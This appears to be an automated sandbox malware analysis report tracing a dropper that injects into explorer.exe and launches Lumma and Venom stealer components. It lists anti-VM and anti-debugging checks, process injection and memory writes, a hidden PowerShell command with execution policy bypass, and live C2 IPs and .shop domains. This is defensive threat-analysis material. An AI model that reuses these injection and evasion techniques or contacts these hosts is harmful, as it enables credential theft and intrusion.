Source: explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003385000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000002.3064823525.0000000000514000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 00000001.00000000.1700000036.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: EF14.exe Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: explorer.exe, 00000001.00000000.1697734591.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: BitLockerToGo.exe, 00000010.00000002.2751996058.000000000334B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: 2D42.exe, 0000000A.00000002.2815804858.000001E01D94A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: explorer.exe, 00000001.00000000.1699388658.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: EF14.exe, 00000009.00000002.2563763619.000001FBFEF48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2710861827.000001B9D1260000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000013.00000002.4108045764.0000000000694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000017.00000002.2771894139.0000020017A57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EF14.exe Binary or memory string: W5Y0tdCLLaYcvsKzyKBjidpmE1BHc86vjlhun29UAQ6rJZ1+hAUJMv6yDSm77LFR/At8wqZArKFjRxye1Iekrog93ttnyK5FEDw6+RPvmPZJmn2Ny6c69E2SUhEO/vtkGH1tLlOBSTv07SHKhP/k6uLKuu96C1dMI7KMMDP4XkpI2+Y6DismsMB9BV85H06QXorwQF/T+HT6QsQfi/vOoJWQZYuU+4o6mvX48r/Ht0VEJcT/p2XyRwBvMciXpPpRvoj9
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC3329 CheckRemoteDebuggerPresent, 10_2_00007FFD9BAC3329
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03089D10 LdrInitializeThunk, 16_2_03089D10
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8EDF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_6C8EDF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D64F0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess, 19_2_6C8D64F0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8EF853 mov eax, dword ptr fs:[00000030h] 19_2_6C8EF853
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8ED49D mov ecx, dword ptr fs:[00000030h] 19_2_6C8ED49D
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87F853 mov eax, dword ptr fs:[00000030h] 20_2_6C87F853
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87D49D mov ecx, dword ptr fs:[00000030h] 20_2_6C87D49D
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8F6CF0 GetProcessHeap,HeapAlloc, 19_2_6C8F6CF0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8EDF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_6C8EDF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E8B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_6C8E8B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8E90B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_6C8E90B9
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87DF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_6C87DF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C878B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_6C878B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C8790B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_6C8790B9
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: 8EC7.exe.1.dr Jump to dropped file
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.144.253.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443 Jump to behavior
Source: 2D42.exe.1.dr, SAPIENHost.cs Reference to suspicious API methods: FindResource(hINSTANCE, new IntPtr(num), new IntPtr(10))
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, DInvokeCore.cs Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3010000 protect: page read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3060000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3070000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory allocated: C:\Windows\explorer.exe base: 3080000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory protected: C:\Windows\explorer.exe base: 3010000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Thread created: C:\Windows\explorer.exe EIP: 7D819D0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Thread created: unknown EIP: 33E19D0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: PID: 2580 base: 3010000 value: 20 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: PID: 2580 base: 3011000 value: 48 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: PID: 2580 base: 3080030 value: 00 Jump to behavior
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: indexterityszcoxp.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: lariatedzugspd.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: callosallsaospz.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: outpointsozp.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: liernessfornicsa.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: upknittsoappz.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: shepherdlyopzc.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: unseaffarignsk.shop
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: C:\Windows\explorer.exe base: 3010000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: C:\Windows\explorer.exe base: 3011000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Memory written: C:\Windows\explorer.exe base: 3080030 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F5F008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership, 7_2_00007FF64166F310
Source: explorer.exe, 00000001.00000000.1697550240.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2D42.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
